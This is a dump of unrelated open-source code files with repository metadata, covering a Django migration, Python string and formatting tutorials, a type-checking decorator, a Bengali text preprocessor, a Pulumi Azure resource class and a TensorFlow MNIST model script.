            'container_template': ('django.db.models.fields.CharField', [], {'default': "('Default', 'cmsplugin_configurableproduct/product-list/containers/default.html')", 'max_length': '256', 'null': 'True', 'blank': 'True'}),
            'filter_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'filter_product_attributes': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
            'hide_empty_categories': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'item_template': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
        },
        'cmsplugin_configurableproduct.cproducttypesplugin': {
            'Meta': {'object_name': 'CProductTypesPlugin', 'db_table': "'cmsplugin_cproducttypesplugin'", '_ormbases': ['cms.CMSPlugin']},
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductType']", 'null': 'True', 'blank': 'True'}),
            'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
            'container_template': ('django.db.models.fields.CharField', [], {'default': "('Default', 'cmsplugin_configurableproduct/product-types/containers/default.html')", 'max_length': '256', 'null': 'True', 'blank': 'True'}),
            'hide_empty_categories': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'item_template': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'default': "'Categories'", 'max_length': '128', 'null': 'True', 'blank': 'True'})
        },
        'cmsplugin_configurableproduct.producttypeicon': {
            'Meta': {'unique_together': "(('product_type', 'name'),)", 'object_name': 'ProductTypeIcon'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "'small'", 'max_length': '128'}),
            'product_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'icons'", 'to': "orm['configurableproduct.ProductType']"})
        },
        'configurableproduct.productbooleanfield': {
            'Meta': {'object_name': 'ProductBooleanField'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'configurableproduct.productcharfield': {
            'Meta': {'object_name': 'ProductCharField'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'configurableproduct.productfloatfield': {
            'Meta': {'object_name': 'ProductFloatField'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'configurableproduct.productimagefield': {
            'Meta': {'object_name': 'ProductImageField'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'configurableproduct.producttype': {
            'Meta': {'object_name': 'ProductType'},
            'boolean_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductBooleanField']", 'null': 'True', 'through': "orm['configurableproduct.TypeBoolean']", 'blank': 'True'}),
            'char_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductCharField']", 'null': 'True', 'through': "orm['configurableproduct.TypeChar']", 'blank': 'True'}),
            'float_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductFloatField']", 'null': 'True', 'through': "orm['configurableproduct.TypeFloat']", 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductImageField']", 'null': 'True', 'through': "orm['configurableproduct.TypeImage']", 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
        },
        'configurableproduct.typeboolean': {
            'Meta': {'ordering': "['order']", 'object_name': 'TypeBoolean'},
            'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductBooleanField']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
        },
        'configurableproduct.typechar': {
            'Meta': {'ordering': "['order']", 'object_name': 'TypeChar'},
            'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductCharField']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
        },
        'configurableproduct.typefloat': {
            'Meta': {'ordering': "['order']", 'object_name': 'TypeFloat'},
            'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductFloatField']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
        },
        'configurableproduct.typeimage': {
            'Meta': {'ordering': "['order']", 'object_name': 'TypeImage'},
            'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductImageField']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
        }
    }
    complete_apps = ['cmsplugin_configurableproduct']
| [
"zeno.jiricek@urpages.net"
] | zeno.jiricek@urpages.net |
7849b2b7c4842ebe127760a458ab217b97e6dfe3 | 1f6a162de77fca1d74af3f341ec815825c15f54c | /strings.py | 0ded33a6a410dd31407cdbdaee0c8749509fe68d | [] | no_license | nickdevp/pysamp | 8b96f93ad15b7caa080f4790b240a68476ff7461 | 22fdf234878bf62400cb7604ab582cf9c46a491f | refs/heads/master | 2021-01-13T01:31:27.335085 | 2015-06-28T21:12:43 | 2015-06-28T21:12:43 | 38,157,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py |
"""Demonstrate str.replace() and slice indexing; expected output in comments."""
from __future__ import print_function
# == REPLACEMENT ==
# str.replace() returns a NEW string; the original is left untouched.
# NOTE: case insensitive replacement requires 're' module
text = "Hello World World"
print(text) # "Hello World World"
print(text.replace("World", "Nick")) # "Hello Nick Nick"
# The optional third argument caps how many occurrences are replaced.
print(text.replace("World", "Nick", 1)) # "Hello Nick World"
print(text) # "Hello World World" (unchanged by the calls above)
# == SLICING ==
# SYNTAX: text[start:end:step]
# 'end' and 'step' are optional
# text[start] = char at position 'start'
# text[start:] = substring from 'start' to end of 'text'
# text[start:end] = substring from 'start' to before 'end' ('end' is exclusive)
text = "Nick rocks"
# Think of indices as cut points between characters:
# 0 is before 'N'
# 1 is before 'i' and after 'N'
# 2 is before 'c' and after 'i'
# -1 is before 's' (negative indices count from the right)
print(text[0:4]) # "Nick"
print(text[-5:]) # "rocks"
print(text[-5:-3]) # "ro"
| [
"nickdevp@outlook.com"
] | nickdevp@outlook.com |
52009571a059032b36dab76217410a7d0c185d26 | cd5c8ac975b9a78d020815d05be60bfebd263329 | /9/9.7.py | 3a074c179819850b02122551742fe6a5edaabba2 | [] | no_license | ttlttl/PythonCookBook-study | 10dbc72398d62de4e0c625eb3b61c7e084792f2f | 7c8a496874f34fb9efc57335644d2cd67839144d | refs/heads/master | 2021-01-21T04:59:50.554195 | 2016-06-15T14:37:59 | 2016-06-15T14:37:59 | 48,616,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,235 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
利用装饰器对函数参数强制执行类型检查。
inspect.signature()函数允许我们从一个可调用对象中提取出参数签名信息。
"""
from inspect import signature
from functools import wraps
def typeassert(*ty_args, **ty_kwargs):
    """Decorator factory that enforces argument types at call time.

    Types are matched to the decorated function's parameters by position
    and keyword via its signature; unconstrained parameters are skipped.
    """
    def decorate(func):
        # Under optimized mode (python -O) skip all checking entirely.
        if not __debug__:
            return func
        sig = signature(func)
        # Parameter name -> required type, for the types actually supplied.
        expected = sig.bind_partial(*ty_args, **ty_kwargs).arguments
        @wraps(func)
        def wrapper(*args, **kwargs):
            bound = sig.bind(*args, **kwargs)
            for name, value in bound.arguments.items():
                if name not in expected:
                    continue
                if not isinstance(value, expected[name]):
                    raise TypeError(
                        'Argument {} must be {}'.format(name, expected[name])
                    )
            return func(*args, **kwargs)
        return wrapper
    return decorate
if __name__ == '__main__':
    # Demo: constrain x to int and z to int; y is left unchecked.
    @typeassert(int, z=int)
    def spam(x, y, z=42):
        print(x, y, z)
    spam(1, 2, 3)  # OK: all constrained arguments are ints
    spam(1, 'hello', 3)  # OK: y is not type-checked
    spam(1,'hello', 'world')  # raises TypeError: z must be int
| [
"wangmingape@gmail.com"
] | wangmingape@gmail.com |
1f0bb8225ed57a6b8199fb94bf797a376b9c23ea | 8201e0e2ab1c528e6b445f12c19c4f39f14ab8da | /08-16/formatting.py | 2e0aa9f20eceefb5db017adea2c62694ea7428dd | [] | no_license | ucsb-cs8-m18/code-from-class | c8d1d3af8f35e29edd8d9b66694662219e956029 | 5658ac2dca3a29e948e14456e6adbea222bce209 | refs/heads/master | 2020-03-25T16:02:55.666072 | 2018-09-12T18:03:17 | 2018-09-12T18:03:17 | 143,912,380 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | month = 8
day = 16
year = 2018
# sep is inserted between print's arguments; "" joins them with nothing
print(month, "/", day, "/", year, sep="")
# manual concatenation requires converting the ints to str first
print(str(month) + "/" + str(day) + "/" + str(year))
print(month, day, year, sep="/")
# "...{}..." is a format string; {n} selects the n-th positional argument
print("{0}/{1}/{2}".format(month, day, year))
print("{1}/{0}/{2}".format(month, day, year))
print("{2}/{0}/{1}".format(month, day, year))
# empty braces consume arguments in order;
# this is the same as print("{0}/{1}/{2}".format(month, day, year))
print("{}/{}/{}".format(month, day, year))
# let's make a times table now
# the :5 part sets the width of the thing you're printing
# to be 5 spaces wide
print("{0:5}".format(42))
for i in range(1, 6):
    print("{} {} {} {} {}".format(i*1, i*2, i*3, i*4, i*5))
# pad each cell to width 2 so the columns line up
for i in range(1, 6):
    print("{:2} {:2} {:2} {:2} {:2}".format(i*1, i*2, i*3, i*4, i*5))
# the < left aligns things within the 2-character field
for i in range(1, 6):
    print("{:<2} {:<2} {:<2} {:<2} {:<2}".format(i*1, i*2, i*3, i*4, i*5))
# end is usually set to "\n", which is a new line; "" suppresses it
print(42, end="")
print(" hi", end="")
| [
"lawtonnichols@gmail.com"
] | lawtonnichols@gmail.com |
491d28bb4be3205a28e15b1faebc1cd701d2860f | 80d5031342288c188dc7a73bbe07c4770c5b8a6f | /domain/game/ended.py | 2339bea3b00d1919cd2d75c7fb01cf04c305d3c4 | [] | no_license | theodormanolescu/hero | 19b2d6b897e88400ebdb93b07514255d925d5257 | a05226437c1430c698c54c4b54ccb99fcc57309e | refs/heads/master | 2023-06-04T04:35:13.273992 | 2021-06-22T19:17:27 | 2021-06-22T19:17:27 | 379,178,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | from application.event_interface import EventInterface
class Ended(EventInterface):
    """Domain event carrying the final fight/round totals of a game."""
    def __init__(self, fights: int, rounds: int):
        # Totals accumulated over the whole game.
        self.fights: int = fights
        self.rounds: int = rounds
    def get_name(self) -> str:
        # Identifier under which this event is dispatched/subscribed.
        return 'game_ended'
| [
"thedor.manolescu@emag.ro"
] | thedor.manolescu@emag.ro |
084c743b67522a9f0ccc3613ab455aa6bbf74ee1 | 633d7e9174c967b0f77830c630ec0a7e7cbee901 | /src/task3/1_hindi_bengali_bilstm_sa_jdil/bengali_preprocess.py | ca527cf9b7f5e326cc4335f59d6386e6609cfbd4 | [
"MIT"
] | permissive | pritiyadav888/nnti_hindi_bengali_sentiment_analysis | d9694de7092ec9a51041113647c606aaeb70d8e2 | 0583ed0817824ad83f458f3be5bfab7b6e13a629 | refs/heads/main | 2023-07-27T02:39:55.202261 | 2021-09-10T14:48:33 | 2021-09-10T14:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,959 | py | import re
"""
Performs basic text cleansing on the unstructured field
and adds additional column to the input dataframe
"""
class Preprocess:
    """Basic text cleanser: lower-cases, strips usernames/punctuation/stopwords
    and adds the result as a `clean_text` column to a dataframe."""

    def __init__(self, stpwds_file_path):
        """
        Initializes regex patterns and loads stopwords.

        :param stpwds_file_path: path to a UTF-8 file with one stopword per line
        """
        self.USERNAME_PATTERN = r'@([A-Za-z0-9_]+)'  ## regex pattern for removing user names
        self.PUNCTUATION_PATTERN = '\'’|!@$%^&*()_+<>?:.,;-'  ## all punctuation symbols to be removed
        self.STOPWORDS_PATH = stpwds_file_path  ## set stopwords file path
        self.load_stopwords()  ## load stopwords from file

    def load_stopwords(self):
        """
        Loads stopwords from file into self.stopwords_bengali.
        """
        # Use a context manager so the file handle is closed deterministically
        # (the original left the handle open for the process lifetime).
        with open(self.STOPWORDS_PATH, 'r', encoding='utf-8') as stopwords_file:
            self.stopwords_bengali = [line.replace('\n', '') for line in stopwords_file]

    def remove_punctuations(self, text):
        """
        Removes punctuation characters from the text field.
        """
        return "".join([c for c in text if c not in self.PUNCTUATION_PATTERN])

    def remove_stopwords(self, text):
        """
        Removes stopwords from the text field (re-joins with single spaces).
        """
        return " ".join([word for word in text.split() if word not in self.stopwords_bengali])

    def remove_usernames(self, text):
        """
        Removes @usernames from the text field.
        """
        return re.sub(self.USERNAME_PATTERN, '', text)

    def perform_preprocessing(self, data):
        """Clean the `sentence` column of *data* into a new `clean_text`
        column and return the (mutated) dataframe."""
        data['clean_text'] = data.sentence.apply(lambda text: text.lower())  ## normalizing text to lower case
        data['clean_text'] = data.clean_text.apply(self.remove_usernames)  ## removing usernames
        data['clean_text'] = data.clean_text.apply(self.remove_punctuations)  ## removing punctuations
        data['clean_text'] = data.clean_text.apply(self.remove_stopwords)  ## removing stopwords
        return data
"sk28671@gmail.com"
] | sk28671@gmail.com |
b120a89e2d2dd9e418954d016dc61f794cb03dc7 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/domainregistration/v20201001/domain_ownership_identifier.py | 0686f0d099df8d96bf3e28acd50d6042d8b40850 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,342 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['DomainOwnershipIdentifierArgs', 'DomainOwnershipIdentifier']
# NOTE(review): generated by the Pulumi SDK Generator (see file header);
# prefer regenerating over hand-editing.
@pulumi.input_type
class DomainOwnershipIdentifierArgs:
    def __init__(__self__, *,
                 domain_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 kind: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 ownership_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a DomainOwnershipIdentifier resource.
        :param pulumi.Input[str] domain_name: Name of domain.
        :param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
        :param pulumi.Input[str] kind: Kind of resource.
        :param pulumi.Input[str] name: Name of identifier.
        :param pulumi.Input[str] ownership_id: Ownership Id.
        """
        pulumi.set(__self__, "domain_name", domain_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Optional arguments are only stored when a value was actually supplied.
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if ownership_id is not None:
            pulumi.set(__self__, "ownership_id", ownership_id)
    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        Name of domain.
        """
        return pulumi.get(self, "domain_name")
    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        Name of the resource group to which the resource belongs.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter
    def kind(self) -> Optional[pulumi.Input[str]]:
        """
        Kind of resource.
        """
        return pulumi.get(self, "kind")
    @kind.setter
    def kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kind", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of identifier.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="ownershipId")
    def ownership_id(self) -> Optional[pulumi.Input[str]]:
        """
        Ownership Id.
        """
        return pulumi.get(self, "ownership_id")
    @ownership_id.setter
    def ownership_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ownership_id", value)
# NOTE(review): generated by the Pulumi SDK Generator (see file header);
# prefer regenerating over hand-editing.
class DomainOwnershipIdentifier(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 domain_name: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 ownership_id: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Domain ownership Identifier.
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] domain_name: Name of domain.
        :param pulumi.Input[str] kind: Kind of resource.
        :param pulumi.Input[str] name: Name of identifier.
        :param pulumi.Input[str] ownership_id: Ownership Id.
        :param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DomainOwnershipIdentifierArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Domain ownership Identifier.
        :param str resource_name: The name of the resource.
        :param DomainOwnershipIdentifierArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the (args-object) and (keyword-arguments) overloads.
        resource_args, opts = _utilities.get_resource_args_opts(DomainOwnershipIdentifierArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       domain_name: Optional[pulumi.Input[str]] = None,
                       kind: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       ownership_id: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # __props__ is only meaningful when adopting an existing resource by id.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
            if domain_name is None and not opts.urn:
                raise TypeError("Missing required property 'domain_name'")
            __props__.__dict__["domain_name"] = domain_name
            __props__.__dict__["kind"] = kind
            __props__.__dict__["name"] = name
            __props__.__dict__["ownership_id"] = ownership_id
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases map this type across the other azure-native API versions so
        # upgrades do not replace existing resources.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:domainregistration:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20150401:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20180201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20190801:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200601:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200901:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20201201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210101:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210115:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210201:DomainOwnershipIdentifier")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(DomainOwnershipIdentifier, __self__).__init__(
            'azure-native:domainregistration/v20201001:DomainOwnershipIdentifier',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'DomainOwnershipIdentifier':
        """
        Get an existing DomainOwnershipIdentifier resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
        # All properties start unset (None) for the lookup by id.
        __props__.__dict__["kind"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["ownership_id"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["type"] = None
        return DomainOwnershipIdentifier(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[Optional[str]]:
        """
        Kind of resource.
        """
        return pulumi.get(self, "kind")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Resource Name.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="ownershipId")
    def ownership_id(self) -> pulumi.Output[Optional[str]]:
        """
        Ownership Id.
        """
        return pulumi.get(self, "ownership_id")
    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        The system metadata relating to this resource.
        """
        return pulumi.get(self, "system_data")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Resource type.
        """
        return pulumi.get(self, "type")
| [
"noreply@github.com"
] | bpkgoud.noreply@github.com |
92133a5ef112f17025321f25820ce497167582b9 | aa2e2765185122be8f5cff48c7fbce999f02435a | /script/ModelAndTest.py | 8693a74848de0157f0c044d8058fc489eecb7761 | [] | no_license | Lightmann/BatchNormGD | ee904a944a757438040c9203163a2d108da556c0 | 22225684cc3525073ca8ecf4712fa4226f39743c | refs/heads/master | 2020-05-20T11:15:27.161145 | 2019-05-08T06:37:32 | 2019-05-08T06:37:32 | 185,545,206 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 30,708 | py | # coding: utf-8
# 2018-08-17
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
# save and load
import pickle # import cpickle as pickle
def data_save(data, filename):
    """Serialize `data` to `filename` (conventionally a *.dat file) with pickle.

    Uses a context manager so the file handle is closed even if pickling
    raises (the original open/close pair leaked the handle on error).
    """
    with open(filename, "wb") as f:
        pickle.dump(data, f)
def data_load(filename):
    """Return the object previously stored in `filename` by data_save().

    The original `pickle.load(open(...))` left the file handle to be closed
    by the garbage collector; a context manager closes it deterministically.
    """
    with open(filename, "rb") as f:
        return pickle.load(f)
# # Model
class Model(object):
    """Abstract base class for trainable models.

    Subclasses build their graph and override predict/loss/metrics/
    optimizer/train; the base implementations only raise
    NotImplementedError.

    Fix: the abstract stubs were declared without `self`, so calling e.g.
    `m.loss()` raised TypeError ("takes 0 positional arguments") instead of
    NotImplementedError. Signatures now match how instances call them and
    how subclasses override them.
    """
    def __init__(self, **args):
        """ Build some model here """
        print(args)
    def predict(self, inputs):
        """Compute the model output for `inputs` (must be overridden)."""
        raise NotImplementedError
    def loss(self):
        """Define the training loss (must be overridden)."""
        raise NotImplementedError
    def metrics(self):
        """Define evaluation metrics (must be overridden)."""
        raise NotImplementedError
    def optimizer(self):
        """Define the optimization step (must be overridden)."""
        raise NotImplementedError
    def train(self, dataset):
        """Run the training loop over `dataset` (must be overridden)."""
        raise NotImplementedError
    def set_tensorboard(self, logdir):
        """Remember where TensorBoard logs/checkpoints should be written."""
        self.tensorboard_dir = logdir
# ## Model_mnist
class Model_mnist(Model):
name = 'mnist'
method = 'none'
#image_size = 28
image_channel = 1
#def __init__(self, **args):
    def __init__(self, image_size=28, hidden_size=100, **args):
        """Build the whole TF graph: placeholders, forward pass, loss,
        metrics and optimizer, plus init/saver/summary ops.

        Construction order matters: loss() reads self.y (stored by the
        subclass's predict()), and the loss/accuracy methods replace
        themselves with the tensors they build.
        """
        tf.reset_default_graph()
        self.image_size = image_size
        self.hidden_size = hidden_size
        # Hyper-parameters are fed via placeholders so they can vary per run.
        learning_rate = tf.placeholder(tf.float32, name='learning_rate')
        learning_rate_abph = tf.placeholder(tf.float32, name='learning_rate_ab')
        is_training = tf.placeholder(tf.bool, name='is_training')
        #x = tf.placeholder(tf.float32, shape=[None, 784], name='x')
        x = tf.placeholder(tf.float32, shape=[None, self.image_channel * self.image_size**2], name='x')
        labels = tf.placeholder(tf.float32, shape=[None, 10], name='labels')
        #x_image = tf.reshape(x, [-1, 28, 28, 1])
        x_image = tf.reshape(x, [-1, self.image_size, self.image_size, self.image_channel])
        self.x = x
        self.labels = labels
        self.learning_rate = learning_rate
        self.learning_rate_abph = learning_rate_abph
        self.learning_rate_ab = 0.1 # default
        self.is_training = is_training
        # Each call stores its result on self (e.g. loss -> self.loss tensor,
        # metrics -> self.accuracy tensor).
        self.predict(x_image)
        self.loss(labels)
        self.metrics()
        self.optimizer()
        self.init = tf.global_variables_initializer()
        self.saver = tf.train.Saver(max_to_keep=0)
        tf.summary.scalar('loss', self.loss)
        tf.summary.scalar('accu', self.accuracy)
        print('A model for %s is created using %s method.' %(self.name, self.method))
        self.scaling = [] # add to test the scaling property
        self.regamma = [] # add to test different value of gamma
    def __del__(self):
        # Finalizer hook: just log that the model object is being destroyed.
        print("__del__")
    def predict(self, x_image):
        """Build the forward pass from `x_image`; subclasses must override
        and store the output probabilities as self.y (loss() and metrics()
        read self.y)."""
        raise NotImplementedError
def loss(self, labels):
y = self.y
self.labels = labels
#cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=logits))
cross_entropy = -tf.reduce_mean(tf.reduce_sum(labels * tf.log(y), reduction_indices=[1]),name="cross_entropy")
self.loss = cross_entropy
def metrics(self):
y = self.y
labels = self.labels
correct_prediction = tf.equal(tf.argmax(y, axis=1), tf.argmax(labels, axis=1), name='correct_prediction')
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32),name='accuracy')
self.accuracy = accuracy
def optimizer(self):
learning_rate = self.learning_rate
#self.training_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.loss)
with tf.name_scope("train"):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print('extra_update_ops:\n',extra_update_ops)
with tf.control_dependencies(extra_update_ops):
self.training_op = optimizer.minimize(self.loss)
def set_scaling(self,weight_aug=1.0):
# a test
self.scaling = []
#print(tf.trainable_variables())
print('\n')
for w in tf.trainable_variables():
if 'gamma' in w.name or 'beta' in w.name:
print('not scaling:',w)
else:
print('scaling %g:' % weight_aug,w)
self.scaling.append( tf.assign(w, w*weight_aug) )
def set_gamma(self,gamma=1.0):
self.regamma = []
for w in tf.trainable_variables():
if 'gamma' in w.name:
print('set value %g:' % gamma,w)
self.regamma.append( tf.assign(w, gamma) )
    def train(self, dataset, learning_rate = 1e-3, n_batch=100, max_step=1000):
        """Run SGD for `max_step` batches, logging train/test loss+accuracy every 10 steps.

        Saves a checkpoint at the end and dumps the metric history to a .dat
        file under `self.tensorboard_dir`.
        """
        #sess = tf.InteractiveSession()
        with tf.Session() as sess:
            sess.run(self.init)
            sess.run(self.scaling) # test the scaling property
            sess.run(self.regamma) # test the gamma value
            # Run tag encodes method + hyperparameters for output filenames.
            plan_tag = '%s_lr%g_nb%d_it%d' % (self.method, learning_rate, n_batch, max_step)
            print(plan_tag)
            tensorboard_dir = self.tensorboard_dir
            saver = self.saver #.as_saver_def()
